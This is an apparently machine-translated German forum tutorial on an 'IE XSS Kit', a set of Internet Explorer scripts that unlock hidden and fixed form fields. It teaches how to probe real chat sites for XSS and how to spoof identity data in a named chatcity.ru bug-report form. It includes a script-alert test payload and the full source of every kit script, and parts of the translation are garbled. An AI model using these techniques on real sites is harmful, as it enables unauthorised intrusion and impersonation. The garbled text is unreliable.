in * .htm und verwenden Sie 


IE XSS Kit



Ich beschloss, in meiner Freizeit eine Reihe von Tools für xss in Betracht zu ziehen, die sich auf der Website des Anti-Chat befinden. Laden Sie das IE xss-Kit herunter. Ein weiteres kleines Vorwort. Ich habe alles in diesem Abschnitt gepostet. Dieses Kit hilft bei der Suche nach Schwachstellen im Chat und erhöht Ihre Fähigkeiten ein wenig. Heute werde ich Sie kurz über den Formulareditor informieren:

Form_Select-one2Text

Mit diesem Formulareditor können wir Rahmen mit verdrahteten Optionen zu einem eigenen Testfeld machen.

Fangen wir mit dem einfachsten an. In den meisten Chats gibt es eine Farbauswahl, die in der HTML-Form auf folgende Weise erfolgt:

  <OPTION selected VALUE = "Black" STYLE = "color: black"> Black </ OPTION> In Wirklichkeit sieht das so aus:
IPB-Bild Wie Sie sehen, gibt es verdrahtete Farben, die Verwendung anderer Farben ist noch nicht möglich. 
 Nun bewegen wir den Mauszeiger mit der Farbauswahl zum Rahmen. 
 Klicken Sie mit der rechten Maustaste, und wählen Sie den Befehl Form_Select-one2Text aus
 
 Und dieser Rahmen mit einer strengen Farbauswahl wird zu einem leeren Rahmen mit der Möglichkeit, dort beliebigen Text zu schreiben. 
 (Aber nicht alles, was Sie schreiben, wird funktionieren). 
 So sieht es nach der Anwendung von Form_Select-one2Text aus :
IPB-Bild Jetzt haben Sie die Möglichkeit, einen beliebigen Farbcode einzugeben, beispielsweise #FFFFFF. 
 Dieser Befehl macht auch viele Frames für die Bearbeitung frei. 
 (Zum Beispiel habe ich mir im selben Chat bei der Auswahl einer Etage einen "Nightmare Hermofrodit" gemacht). 
 Sie können auch direkt nach xss-Schwachstellen suchen, indem Sie diesen Code in Frames einsetzen, die für uns verfügbar sind.
 Hier sind viele Codes, die eine Warnung auslösen können und tatsächlich xss finden. 
 Sie sind jetzt mit dem Formulareditor Form_Select-one2Text vertraut



Form_Method2Text, Form_Hidden2Text

Beginnen wir mit Form_Method2Text . Das Team selbst ist nicht unbedingt nötig, weil Es öffnet sich der Rahmen, in dem die Arbeitsweise der Seite geschrieben ist. Die grundlegendsten Methoden sind: Post und Get. Die Post-Methode bedeutet, dass Sie Ihre Daten auf der Seite eingeben. Meistens wird es in Foren, Gästebüchern, Chatrooms usw. gefunden. Methode get bedeutet, dass Sie alle Daten von der Seite selbst abrufen. Meistens werden sie in Suchmaschinen verwendet. Diese Methode kann fast überall gefunden werden. Im Allgemeinen ist dieser Befehl nicht auffällig, aber er gibt wie andere Zugriff auf einen offenen Rahmen. Und natürlich, in einigen Internet-Ressourcen, wenn Sie den Post oder das Het durch den XSS-Code ersetzen, ist das Javascript erfolgreich.

Gehen wir nun den Befehl Form_Hidden2Text durch . Mit diesem Befehl können Sie die in die Seite eingenähten Daten anzeigen (sortieren) und sie korrigieren.

Ich werde dir ein klares Beispiel zeigen. Ich habe diese Methode in einem der Chatsiti-Chatrooms getestet, wenn ich einen Fehlerbericht senden muss.

  Hier ist es: http://www.38557.chatcity.ru/bug/?err=IllegalChannel(get_ch)&www.38557.chatcity.ru&
 Ich werde den Bildschirm nicht machen, weil  Folgen Sie dem Link und überzeugen Sie sich selbst. 
 Auf dieser Seite verwenden wir nun den Befehl Form_Hidden2Text , 
 Wie Sie sehen, werden die Frames mit den Daten des Benutzers geöffnet, der diese Seite aufgerufen hat. 
 (Sie sind auch in den Samples) Nun können sie bearbeitet werden, ich werde erklären, warum dies notwendig ist. 
 Beim Senden eines Fehlerberichts an den Administrator erhalten die Chatsiti exakt dieselben Daten 
 die uns zur Bearbeitung zur Verfügung stand. 
 Dies legt nahe, dass Sie diesmal anonym bleiben können.  Hier ist ein Bildschirm mit dem, was wir entdeckt haben:
IPB-Bild Wie Sie sehen, können Sie alles löschen oder die Daten anderer Personen ersetzen.
 Und dasselbe wird in gewisser Weise gespeichert:
<input type=hidden name=err value="IllegalChannel(get_ch)"> <input type=hidden name=browser value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"> <input type=hidden name=addr value="айпи мой :) )"> <input type=hidden name=via value=""> <input type=hidden name=referer value="http://www.38557.chatcity.ru/kpobatka"> <input type=hidden name=args value="www.38557.chatcity.ru&">

 Aber jetzt können wir alles bearbeiten und anonym bleiben, indem wir einige behutsame Verwaltungen schreiben

 Mehr können diese beiden Teams nicht.


Form_Target2Text

Das Wort Ziel bedeutet an sich ein Ziel, und dies bedeutet Ihre weitere "Richtung" nach einer Aktion. In diesem Fall öffnen wir bei Verwendung dieses Befehls auch einen zur Bearbeitung verfügbaren Rahmen. In vielen Fällen (wenn das Ziel nicht in Javascripts angegeben ist) wird bei der Verwendung des Befehls ein Link angezeigt, zu dem Sie nach allen Aktionen gesendet werden. Es kann alles sein, indem Sie die OK-Taste drücken, Exit usw. In diesem Fall ist der Befehl Form_Target2Text sehr praktisch für die Xss-Suche. Sie können einem bereits vorhandenen Link einen xss-Code zuweisen oder einfach den Link löschen und den xss-Code registrieren.

LocationReplace

Wenn Sie diesen Befehl ausführen, wird das Skript über die Methodenaufforderung abgefragt. Die Abfrage geht auf eine beliebige Seite. Im Allgemeinen werde ich nicht um den heißen Brei herum schlagen, dieser Befehl ist bei der Suche nach xss eher unbrauchbar, da Damit Sie nicht schreiben, wird Ihr Text zur ursprünglichen Adresse der Seite hinzugefügt, von der aus Sie den Befehl ausgeführt haben.

  Beispiel: _http: //www.ya.ru/
 Wir verwenden LocationReplace , das Fenster fällt heraus, wir geben dort eine einfache Konstruktion ein:

 <script> alert (/ test /) </ script>

 Wir klicken auf OK und werden an folgende Adresse weitergeleitet: http://www.ya.ru/ <script> alert (/ test /) </ script>

 Es gibt keinen Sinn: Diese Methode ist für diejenigen gedacht, die zu faul sind, den Code in die Adressleiste zu schreiben, und nicht mehr. 
 Es kann auch als Referrer verwendet werden.


Alle HTML-Codes, mit denen das IE xss-Kit arbeitet.


Kekse:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zExpires() { var expires = new Date(); expires.setYear(expires.getYear() + 10); return expires.toUTCString(); } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zCookie = zDocument.cookie; var zNew = zWindow.prompt('New Cookie?', zCookie); if (zNew != null) { var zNewCookie = zWindow.prompt('New Cookie:', '; EXPIRES=' + zExpires() + ';'); if (zNewCookie != null) zDocument.cookie = zNewCookie; } </script>



Action2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { with (zForms[i]) { if (!zForms[i].zAction) { innerHTML = '<input type="text" id="zAction" value="' + zConvert(action) + '" title="action" onChange="document.forms[' + i + '].action = this.value">' + innerHTML; } } } </script>



Checkbox2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'checkbox') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '" onDblClick="this.outerHTML = \'\'">'; } } } } </script>



EventsOFF:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var ii in zForms[i]) { if (ii.match(/^on/i) && (zForms[i].getAttribute(ii) != null)) { zForms[i].setAttribute(ii, null); } } for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { for (var jj in zForms[i].elements[j]) { if (jj.match(/^on/i) && (zForms[i].elements[j].getAttribute(jj) != null)) { zForms[i].elements[j].setAttribute(jj, null); } } } } </script>



Hidden2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'hidden') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '">'; } } } } </script>



Method2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { with (zForms[i]) { if (!zForms[i].zMethod) { innerHTML = '<input type="text" id="zMethod" value="' + zConvert(method) + '" title="method" onChange="document.forms[' + i + '].method = this.value">' + innerHTML; } } } </script>



Radio2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'radio') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '" onDblClick="this.outerHTML = \'\'">'; } } } } </script>



Select-One2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'select-one') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '">'; } } } } </script>



Target2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { with (zForms[i]) { if (!zForms[i].zTarget) { innerHTML = '<input type="text" id="zTarget" value="' + zConvert(target) + '" title="target" onChange="document.forms[' + i + '].target = this.value">' + innerHTML; } } } </script>



LocationReplace:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru var zWindow = external.menuArguments; var zLocation = zWindow.location; var zNewLocation = zWindow.prompt('New Location:', zLocation); if (zNewLocation != null) zLocation.replace(zNewLocation); </script>